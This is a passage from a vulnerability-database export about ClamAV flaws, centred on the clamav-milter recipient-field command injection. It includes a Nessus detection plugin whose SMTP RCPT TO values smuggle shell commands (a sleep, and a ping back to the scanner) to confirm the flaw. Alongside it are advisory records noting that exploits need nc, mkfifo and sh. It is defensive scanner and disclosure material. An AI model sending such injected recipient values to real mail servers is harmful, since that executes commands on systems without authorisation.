exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\n\nif (! thorough_tests ) exit(0);\n\n\n# Don't bother checking Windows as ClamAV isn't known to run on it.\nos = get_kb_item(\"Host/OS\");\nif (os && \"Windows\" >< os) exit(0);\n\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\nif (get_kb_item('SMTP/'+port+'/broken')) exit(0);\n\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) exit(0);\n\n\nfrom = \"\"; # nb: must be a valid sender\nrcpt = \"nobody\"; # nb: must be a valid recipient on remote\n\n\n# Try to ping the Nessus host with a special pattern.\nping_pat = \"cafebabe\";\ncmd = string(\"sleep 1; ping -p \", ping_pat, \" -c 3 \", this_host_name());\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\n\nc = string('MAIL FROM: <', from, '>');\nsend(socket:soc, data:string(c, \"\\r\\n\"));\ns = smtp_recv_line(socket:soc);\nif (strlen(s) && ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n c = string('RCPT TO: <', rcpt, '+\"|', cmd, '\"@localhost>');\n send(socket:soc, data:string(c, \"\\r\\n\"));\n s = smtp_recv_line(socket:soc);\n if (strlen(s) && ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n c = 'DATA';\n send(socket:soc, data:string(c, \"\\r\\n\"));\n s = smtp_recv_line(socket:soc);\n if (strlen(s) && ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n c = '.';\n s = send_capture(socket:soc, data:string(c, \"\\r\\n\"), pcap_filter:filter);\n icmp_data = get_icmp_element(icmp:s, element:\"data\");\n\n if (tolower(ping_pat) >< tolower(hexstr(icmp_data)))\n {\n smtp_close(socket:soc);\n security_hole(port);\n exit(0);\n }\n }\n }\n}\n\n\n# Try several times to exploit the issue to pause execution for a bit.\n#\n# nb: this sort of check might be problemmatic if the nessusd host\n# is heavily loaded.\nif ( report_paranoia < 2 ) exit(0);\n\nif (thorough_tests) delays = make_list(1, 6, 11, 16, 21);\nelse delays = make_list(1, 4, 7);\npauses = make_array();\n\nforeach delay (delays)\n{\n cmd = string(\"sleep \", delay+1);\n\n c = string('MAIL FROM: <', from, '>');\n send(socket:soc, data: c + '\\r\\n');\n s = smtp_recv_line(socket:soc);\n if (strlen(s) && ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n c = string('RCPT TO: <', rcpt, '+\"|', cmd, '\"@localhost>');\n send(socket:soc, data:string(c, \"\\r\\n\"));\n s = smtp_recv_line(socket:soc);\n if (strlen(s) && ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n c = 'DATA';\n send(socket:soc, data:string(c, \"\\r\\n\"));\n s = smtp_recv_line(socket:soc);\n if (strlen(s) && ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n # Time how long the remote takes to respond.\n start = unixtime();\n c = '.';\n send(socket:soc, data:string(c, \"\\r\\n\"));\n s = smtp_recv_line(socket:soc, retry:5);\n end = unixtime();\n\n pause = end - start;\n pauses[delay] = pause;\n # nb: we're done if the delay obviously had no effect.\n if (strlen(s) && pause < delay) break;\n }\n else break;\n }\n else break;\n }\n else break;\n}\nsmtp_close(socket:soc);\n\n\n# Look at the actual time taken for each test.\nprev_diff = NULL;\nforeach delay (delays)\n{\n # Exit if for some reason we didn't complete all the tests.\n if (isnull(pauses[delay])) exit(0);\n\n # Exit if we're not being paranoid and the second order difference\n # between tests is +-1 second of the expected difference, so we\n # can be reasonably certain the plugin is responsible for the\n # delays rather than a load issue on the remote.\n diff = pauses[delay];\n if (report_paranoia < 2 && !isnull(prev_diff)) \n {\n diff2 = diff - prev_diff;\n if (\n (thorough_tests && (diff2 < 4 || diff2 > 6)) ||\n (!thorough_tests && (diff2 < 2 || diff2 > 4))\n ) exit(0);\n }\n prev_diff = diff;\n}\nsecurity_hole(port);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:25:11", "description": "The remote host is running a version of Mac OS X 10.5 or 10.4 that\ndoes not have the security update 2008-002 applied. \n\nThis update contains several security fixes for a number of programs.", "edition": 24, "published": "2008-03-19T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2008-002)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0056", "CVE-2007-6335", "CVE-2007-1662", "CVE-2008-0063", "CVE-2007-4768", "CVE-2008-0999", "CVE-2006-5793", "CVE-2007-1661", "CVE-2007-5958", "CVE-2007-4752", "CVE-2008-0990", "CVE-2008-0052", "CVE-2008-0994", "CVE-2007-3799", "CVE-2007-6109", "CVE-2007-5901", "CVE-2007-4887", "CVE-2008-0989", "CVE-2007-6429", "CVE-2007-6337", "CVE-2007-6203", "CVE-2008-0046", "CVE-2008-0060", "CVE-2008-0049", "CVE-2007-1659", "CVE-2008-0318", "CVE-2008-0596", "CVE-2008-0006", "CVE-2007-5269", "CVE-2008-0057", "CVE-2006-6481", "CVE-2007-6428", "CVE-2007-5795", "CVE-2006-3334", "CVE-2007-0897", "CVE-2007-0898", "CVE-2007-4510", "CVE-2007-5971", "CVE-2008-0987", "CVE-2007-1997", "CVE-2008-0995", "CVE-2008-0998", "CVE-2008-0728", "CVE-2008-0059", "CVE-2007-1660", "CVE-2008-0992", "CVE-2007-5268", "CVE-2008-0005", "CVE-2008-0993", "CVE-2007-4990", "CVE-2008-0045", "CVE-2006-3747", "CVE-2007-6421", "CVE-2008-0053", "CVE-2007-5266", "CVE-2007-2445", "CVE-2008-0048", "CVE-2007-6427", "CVE-2007-3847", "CVE-2007-4568", "CVE-2007-1745", "CVE-2007-6388", "CVE-2007-4767", "CVE-2007-6336", "CVE-2007-5000", "CVE-2008-0054", "CVE-2007-4560", "CVE-2008-0996", "CVE-2008-0055", "CVE-2005-3352", "CVE-2007-3725", "CVE-2007-3378", "CVE-2007-5267", "CVE-2008-1000", "CVE-2008-0050", "CVE-2008-0882", "CVE-2007-2799", "CVE-2008-0051", "CVE-2008-0997", "CVE-2008-0044", "CVE-2008-0988", "CVE-2008-0062", "CVE-2007-4766", "CVE-2008-0047", "CVE-2008-0058", "CVE-2005-4077"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2008-002.NASL", "href": "https://www.tenable.com/plugins/nessus/31605", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (!defined_func(\"bn_random\")) exit(0);\nif (NASL_LEVEL < 3004) exit(0);\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(31605);\n script_version (\"1.38\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2005-3352\", \"CVE-2005-4077\", \"CVE-2006-3334\", \"CVE-2006-3747\", \"CVE-2006-5793\",\n \"CVE-2006-6481\", \"CVE-2007-0897\", \"CVE-2007-0898\", \"CVE-2007-1659\", \"CVE-2007-1660\",\n \"CVE-2007-1661\", \"CVE-2007-1662\", \"CVE-2007-1745\", \"CVE-2007-1997\", \"CVE-2007-2445\",\n \"CVE-2007-2799\", \"CVE-2007-3378\", \"CVE-2007-3725\", \"CVE-2007-3799\", \"CVE-2007-3847\",\n \"CVE-2007-4510\", \"CVE-2007-4560\", \"CVE-2007-4568\", \"CVE-2007-4752\", \"CVE-2007-4766\",\n \"CVE-2007-4767\", \"CVE-2007-4768\", \"CVE-2007-4887\", \"CVE-2007-4990\", \"CVE-2007-5000\",\n \"CVE-2007-5266\", \"CVE-2007-5267\", \"CVE-2007-5268\", \"CVE-2007-5269\", \"CVE-2007-5795\",\n \"CVE-2007-5901\", \"CVE-2007-5958\", \"CVE-2007-5971\", \"CVE-2007-6109\", \"CVE-2007-6203\",\n \"CVE-2007-6335\", \"CVE-2007-6336\", \"CVE-2007-6337\", \"CVE-2007-6388\", \"CVE-2007-6421\",\n \"CVE-2007-6427\", \"CVE-2007-6428\", \"CVE-2007-6429\", \"CVE-2008-0005\", \"CVE-2008-0006\",\n \"CVE-2008-0044\", \"CVE-2008-0045\", \"CVE-2008-0046\", \"CVE-2008-0047\", \"CVE-2008-0048\",\n \"CVE-2008-0049\", \"CVE-2008-0050\", \"CVE-2008-0051\", \"CVE-2008-0052\", \"CVE-2008-0053\",\n \"CVE-2008-0054\", \"CVE-2008-0055\", \"CVE-2008-0056\", \"CVE-2008-0057\", \"CVE-2008-0058\",\n \"CVE-2008-0059\", \"CVE-2008-0060\", \"CVE-2008-0062\", \"CVE-2008-0063\", \"CVE-2008-0318\",\n \"CVE-2008-0596\", \"CVE-2008-0728\", \"CVE-2008-0882\", \"CVE-2008-0987\", \"CVE-2008-0988\",\n \"CVE-2008-0989\", \"CVE-2008-0990\", \"CVE-2008-0992\", \"CVE-2008-0993\", \"CVE-2008-0994\",\n \"CVE-2008-0995\", \"CVE-2008-0996\", \"CVE-2008-0997\", \"CVE-2008-0998\", \"CVE-2008-0999\",\n \"CVE-2008-1000\");\n script_bugtraq_id(19204, 21078, 24268, 25398, 25439, 25489, 25498, 26346, 26750, 26838,\n 26927, 26946, 27234, 27236, 27751, 27988, 28278, 28303, 28304, 28307,\n 28320, 28323, 28334, 28339, 28340, 28341, 28343, 28344, 28345, 28357,\n 28358, 28359, 28363, 28364, 28365, 28367, 28368, 28371, 28371, 28372,\n 28374, 28375, 28384, 28385, 28386, 28387, 28388, 28389);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2008-002)\");\n script_summary(english:\"Check for the presence of Security Update 2008-002\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes various\nsecurity issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.5 or 10.4 that\ndoes not have the security update 2008-002 applied. \n\nThis update contains several security fixes for a number of programs.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=307562\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/advisories/14242\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2008-002 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 22, 78, 79, 94, 119, 134, 189, 200, 255, 264, 362, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/03/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/08/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/06/02\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\", \"Host/uname\");\n exit(0);\n}\n\n\nuname = get_kb_item(\"Host/uname\");\nif (!uname) exit(0);\n\nif (egrep(pattern:\"Darwin.* (8\\.[0-9]\\.|8\\.1[01]\\.)\", string:uname))\n{\n packages = get_kb_item(\"Host/MacOSX/packages\");\n if (!packages) exit(0);\n\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2008-00[2-8]|2009-|20[1-9][0-9]-)\", string:packages))\n security_hole(0);\n}\nelse if (egrep(pattern:\"Darwin.* (9\\.[0-2]\\.)\", string:uname))\n{\n packages = get_kb_item(\"Host/MacOSX/packages/boms\");\n if (!packages) exit(0);\n\n if (!egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\.2008\\.002\\.bom\", string:packages))\n security_hole(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4510"], "description": "\nBugTraq reports:\n\nClamAV is prone to multiple denial-of-service vulnerabilities.\nA successful attack may allow an attacker to crash the\n\t application and deny service to users.\n\n", "edition": 4, "modified": "2007-08-21T00:00:00", "published": "2007-08-21T00:00:00", "id": "B6F6DA57-680A-11DC-B350-001921AB2FA4", "href": "https://vuxml.freebsd.org/freebsd/b6f6da57-680a-11dc-b350-001921ab2fa4.html", "title": "clamav -- multiple remote Denial of Service vulnerabilities", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-4510"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kolab.org/security/kolab-vendor-notice-17.txt\nVendor Specific News/Changelog Entry: http://sourceforge.net/project/shownotes.php?release_id=533658\nVendor Specific News/Changelog Entry: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=582\nVendor Specific News/Changelog Entry: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=611\n[Secunia Advisory ID:26751](https://secuniaresearch.flexerasoftware.com/advisories/26751/)\n[Secunia Advisory ID:26674](https://secuniaresearch.flexerasoftware.com/advisories/26674/)\n[Secunia Advisory ID:26530](https://secuniaresearch.flexerasoftware.com/advisories/26530/)\n[Secunia Advisory ID:26683](https://secuniaresearch.flexerasoftware.com/advisories/26683/)\n[Secunia Advisory ID:26654](https://secuniaresearch.flexerasoftware.com/advisories/26654/)\n[Secunia Advisory ID:26552](https://secuniaresearch.flexerasoftware.com/advisories/26552/)\n[Secunia Advisory ID:26822](https://secuniaresearch.flexerasoftware.com/advisories/26822/)\n[Related OSVDB ID: 36909](https://vulners.com/osvdb/OSVDB:36909)\n[Related OSVDB ID: 36910](https://vulners.com/osvdb/OSVDB:36910)\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:172\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_18_sr.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:172\nOther Advisory URL: http://www.debian.org/security/2007/dsa-1366\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.html\nOther Advisory URL: http://www.trustix.org/errata/2007/0026/\nOther Advisory URL: http://sourceforge.net/project/shownotes.php?release_id=533658&group_id=86638\nOther Advisory URL: http://kolab.org/security/kolab-vendor-notice-17.txt\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-08/msg00007.html\nISS X-Force ID: 36173\nISS X-Force ID: 36177\nFrSIRT Advisory: ADV-2007-2952\n[CVE-2007-4510](https://vulners.com/cve/CVE-2007-4510)\nBugtraq ID: 25398\n", "edition": 1, "modified": "2007-08-22T14:22:05", "published": "2007-08-22T14:22:05", "href": "https://vulners.com/osvdb/OSVDB:36911", "id": "OSVDB:36911", "title": "Clam AntiVirus libclamav/htmlnorm.c cli_html_normalise Function HTML Handling DoS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-4510"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kolab.org/security/kolab-vendor-notice-17.txt\nVendor Specific News/Changelog Entry: http://sourceforge.net/project/shownotes.php?release_id=533658\nVendor Specific News/Changelog Entry: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=582\nVendor Specific News/Changelog Entry: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=611\n[Secunia Advisory ID:26751](https://secuniaresearch.flexerasoftware.com/advisories/26751/)\n[Secunia Advisory ID:26674](https://secuniaresearch.flexerasoftware.com/advisories/26674/)\n[Secunia Advisory ID:26530](https://secuniaresearch.flexerasoftware.com/advisories/26530/)\n[Secunia Advisory ID:26683](https://secuniaresearch.flexerasoftware.com/advisories/26683/)\n[Secunia Advisory ID:26654](https://secuniaresearch.flexerasoftware.com/advisories/26654/)\n[Secunia Advisory ID:26552](https://secuniaresearch.flexerasoftware.com/advisories/26552/)\n[Secunia Advisory ID:26822](https://secuniaresearch.flexerasoftware.com/advisories/26822/)\n[Related OSVDB ID: 36909](https://vulners.com/osvdb/OSVDB:36909)\n[Related OSVDB ID: 36911](https://vulners.com/osvdb/OSVDB:36911)\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:172\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_18_sr.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:172\nOther Advisory URL: http://www.debian.org/security/2007/dsa-1366\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.html\nOther Advisory URL: http://www.trustix.org/errata/2007/0026/\nOther Advisory URL: http://sourceforge.net/project/shownotes.php?release_id=533658&group_id=86638\nOther Advisory URL: http://kolab.org/security/kolab-vendor-notice-17.txt\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-08/msg00007.html\nISS X-Force ID: 36173\nISS X-Force ID: 36177\nFrSIRT Advisory: ADV-2007-2952\n[CVE-2007-4510](https://vulners.com/cve/CVE-2007-4510)\nBugtraq ID: 25398\n", "edition": 1, "modified": "2007-08-22T14:22:05", "published": "2007-08-22T14:22:05", "href": "https://vulners.com/osvdb/OSVDB:36910", "id": "OSVDB:36910", "title": "Clam AntiVirus libclamav/rtf.c cli_scanrtf Function RTF File Handling DoS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-4560"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018610\n[Secunia Advisory ID:26751](https://secuniaresearch.flexerasoftware.com/advisories/26751/)\n[Secunia Advisory ID:26674](https://secuniaresearch.flexerasoftware.com/advisories/26674/)\n[Secunia Advisory ID:26530](https://secuniaresearch.flexerasoftware.com/advisories/26530/)\n[Secunia Advisory ID:26683](https://secuniaresearch.flexerasoftware.com/advisories/26683/)\n[Secunia Advisory ID:26654](https://secuniaresearch.flexerasoftware.com/advisories/26654/)\n[Secunia Advisory ID:26552](https://secuniaresearch.flexerasoftware.com/advisories/26552/)\n[Secunia Advisory ID:26822](https://secuniaresearch.flexerasoftware.com/advisories/26822/)\n[Related OSVDB ID: 36910](https://vulners.com/osvdb/OSVDB:36910)\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:172\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_18_sr.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:172\nOther Advisory URL: http://www.debian.org/security/2007/dsa-1366\nOther Advisory URL: http://www.nruns.com/security_advisory_clamav_remote_code_exection.php\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.html\nOther Advisory URL: http://www.trustix.org/errata/2007/0026/\nOther Advisory URL: http://sourceforge.net/project/shownotes.php?release_id=533658&group_id=86638\nOther Advisory URL: http://kolab.org/security/kolab-vendor-notice-17.txt\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-08/msg00007.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0409.html\nKeyword: n.runs-SA-2007.025\n[CVE-2007-4560](https://vulners.com/cve/CVE-2007-4560)\nBugtraq ID: 25439\n", "edition": 1, "modified": "2007-08-24T14:22:05", "published": "2007-08-24T14:22:05", "href": "https://vulners.com/osvdb/OSVDB:36909", "id": "OSVDB:36909", "title": "Clam AntiVirus clamav-milter Sendmail Recipient Field Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-4510"], "description": "DoS on RTF and HTML parsing.", "edition": 1, "modified": "2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "SECURITYVULNS:VULN:8176", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8176", "title": "ClamAV antivirus multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4510"], "description": "Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. The virus database is based on the virus database from OpenAntiVirus, but contains additional signatures (including signatures for popular polymorphic viruses, too) and is KEPT UP TO DATE. ", "modified": "2007-09-07T17:18:29", "published": "2007-09-07T17:18:29", "id": "FEDORA:L87HIDSJ000408", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: clamav-0.91.2-2.fc7", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4510", "CVE-2007-6335", "CVE-2008-0318"], "description": "Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. The virus database is based on the virus database from OpenAntiVirus, but contains additional signatures (including signatures for popular polymorphic viruses, too) and is KEPT UP TO DATE. ", "modified": "2008-02-13T05:14:44", "published": "2008-02-13T05:14:44", "id": "FEDORA:M1D5EK0O006502", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: clamav-0.92.1-1.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4510", "CVE-2007-6335", "CVE-2007-6336", "CVE-2007-6337"], "description": "Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. The virus database is based on the virus database from OpenAntiVirus, but contains additional signatures (including signatures for popular polymorphic viruses, too) and is KEPT UP TO DATE. ", "modified": "2008-01-22T15:33:16", "published": "2008-01-22T15:33:16", "id": "FEDORA:M0MFXLNK030295", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: clamav-0.92-6.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4510", "CVE-2007-6335", "CVE-2008-0314", "CVE-2008-1100", "CVE-2008-1387", "CVE-2008-1833"], "description": "Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. The virus database is based on the virus database from OpenAntiVirus, but contains additional signatures (including signatures for popular polymorphic viruses, too) and is KEPT UP TO DATE. ", "modified": "2008-04-29T20:56:27", "published": "2008-04-29T20:56:27", "id": "FEDORA:M3TLB9PC030826", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: clamav-0.92.1-2.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4560"], "description": "Added: 09/06/2007 \nCVE: [CVE-2007-4560](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560>) \nBID: [25439](<http://www.securityfocus.com/bid/25439>) \nOSVDB: [36909](<http://www.osvdb.org/36909>) \n\n\n### Background\n\n[ClamAV](<http://www.clamav.net/>) is an open-source anti-virus toolkit. [clamav-milter](<http://www.clamav.org/download/third-party-tools/3rdparty-mta/>) is a derivative of ClamAV for e-mail servers running Sendmail. \n\n### Problem\n\nAn insecure call to the popen function in clamav-milter, when running in black hole mode, allows an attacker to inject shell commands into the recipient field. \n\n### Resolution\n\n[Upgrade](<http://www.clamav.org/download>) to ClamAV 0.91.2 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/477723> \n\n\n### Limitations\n\nExploit works on ClamAV 0.91.1. \n\nIn order for the exploit to succeed, Sendmail must be configured to use clamav-milter, clamav-milter must be running in black hole mode, and the following utilities must be present on the target system: nc, nc6 (if using IPv6), mkfifo, sh. \n\n", "edition": 4, "modified": "2007-09-06T00:00:00", "published": "2007-09-06T00:00:00", "id": "SAINT:04B532BA379845DF79BE2BAE7217EF75", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/clamav_milter_popen", "title": "ClamAV milter popen command injection", "type": "saint", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:47", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4560"], "edition": 2, "description": "Added: 09/06/2007 \nCVE: [CVE-2007-4560](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560>) \nBID: [25439](<http://www.securityfocus.com/bid/25439>) \nOSVDB: [36909](<http://www.osvdb.org/36909>) \n\n\n### Background\n\n[ClamAV](<http://www.clamav.net/>) is an open-source anti-virus toolkit. [clamav-milter](<http://www.clamav.org/download/third-party-tools/3rdparty-mta/>) is a derivative of ClamAV for e-mail servers running Sendmail. \n\n### Problem\n\nAn insecure call to the popen function in clamav-milter, when running in black hole mode, allows an attacker to inject shell commands into the recipient field. \n\n### Resolution\n\n[Upgrade](<http://www.clamav.org/download>) to ClamAV 0.91.2 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/477723> \n\n\n### Limitations\n\nExploit works on ClamAV 0.91.1. \n\nIn order for the exploit to succeed, Sendmail must be configured to use clamav-milter, clamav-milter must be running in black hole mode, and the following utilities must be present on the target system: nc, nc6 (if using IPv6), mkfifo, sh. \n\n", "modified": "2007-09-06T00:00:00", "published": "2007-09-06T00:00:00", "id": "SAINT:61A42486FDC3E09655A7B9A3336F7AC7", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/clamav_milter_popen", "type": "saint", "title": "ClamAV milter popen command injection", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4560"], "description": "Added: 09/06/2007 \nCVE: [CVE-2007-4560](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560>) \nBID: [25439](<http://www.securityfocus.com/bid/25439>) \nOSVDB: [36909](<http://www.osvdb.org/36909>) \n\n\n### Background\n\n[ClamAV](<http://www.clamav.net/>) is an open-source anti-virus toolkit. [clamav-milter](<http://www.clamav.org/download/third-party-tools/3rdparty-mta/>) is a derivative of ClamAV for e-mail servers running Sendmail. \n\n### Problem\n\nAn insecure call to the popen function in clamav-milter, when running in black hole mode, allows an attacker to inject shell commands into the recipient field. \n\n### Resolution\n\n[Upgrade](<http://www.clamav.org/download>) to ClamAV 0.91.2 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/477723> \n\n\n### Limitations\n\nExploit works on ClamAV 0.91.1. \n\nIn order for the exploit to succeed, Sendmail must be configured to use clamav-milter, clamav-milter must be running in black hole mode, and the following utilities must be present on the target system: nc, nc6 (if using IPv6), mkfifo, sh. \n\n", "edition": 1, "modified": "2007-09-06T00:00:00", "published": "2007-09-06T00:00:00", "id": "SAINT:AFAA5C81CD911B6C862E6FC1DA37BB84", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/clamav_milter_popen", "type": "saint", "title": "ClamAV milter popen command injection", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "d2": [{"lastseen": "2019-05-29T17:19:06", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4560"], "description": "**Name**| d2sec_clamav \n---|--- \n**CVE**| CVE-2007-4560 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| ClamAV Remote Code 